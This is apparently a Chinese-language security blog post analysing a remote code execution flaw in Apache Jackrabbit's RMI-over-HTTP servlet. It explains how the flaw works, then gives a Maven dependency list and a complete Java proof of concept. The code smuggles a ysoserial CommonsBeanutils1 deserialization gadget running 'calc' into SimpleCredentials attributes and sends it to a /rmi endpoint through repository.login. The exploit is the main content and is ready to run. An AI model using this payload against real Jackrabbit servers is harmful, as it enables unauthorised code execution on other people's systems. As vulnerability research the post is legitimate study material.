注意
本文最后更新于 2023-07-28,文中内容可能已过时。
https://lists.apache.org/thread/j03b3qdhborc2jrhdc4d765d3jkh8bfw
漏洞点已经指出来了,rmi over http。
org.apache.jackrabbit.servlet.remote.RemoteBindingServlet
关键是怎么利用呢?根据文档 https://jackrabbit.apache.org/archive/wiki/JCR/RemoteAccess_115513494.html 用JcrUtils拿可以拿到Repository,给定http url拿到的是URLRemoteRepository
Repository接口有几个方法,其中login函数的参数为javax.jcr.Credentials
该接口有两个实现类
其中SimpleCredentials有一个<string,object>类型的hashmap
所以可以将cb序列化payload放入hashmap发送。
pom引入依赖
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
| <dependencies>
<dependency>
<groupId>javax.jcr</groupId>
<artifactId>jcr</artifactId>
<version>2.0</version>
</dependency>
<!-- https://mvnrepository.com/artifact/org.apache.jackrabbit/jackrabbit-jcr-rmi -->
<dependency>
<groupId>org.apache.jackrabbit</groupId>
<artifactId>jackrabbit-jcr-rmi</artifactId>
<version>2.21.10</version>
</dependency>
<dependency>
<groupId>org.apache.jackrabbit</groupId>
<artifactId>jackrabbit-jcr2dav</artifactId>
<version>2.0-beta6</version>
</dependency>
<dependency>
<groupId>org.slf4j</groupId>
<artifactId>slf4j-simple</artifactId>
<version>1.5.8</version>
</dependency>
</dependencies>
|
构造反序列化payload并发送
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
| package org.example;
import org.apache.jackrabbit.commons.JcrUtils;
import ysoserial.payloads.CommonsBeanutils1;
import javax.jcr.Repository;
import javax.jcr.SimpleCredentials;
public class Main {
public static void main(String[] args) throws Exception {
SimpleCredentials simpleCredentials = new SimpleCredentials("1", "1".toCharArray());
simpleCredentials.setAttribute("a", new CommonsBeanutils1().getObject("calc"));
Repository repository = JcrUtils.getRepository("http://localhost:8080/rmi");
repository.login(simpleCredentials);
}
}
|
rce留念
文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。
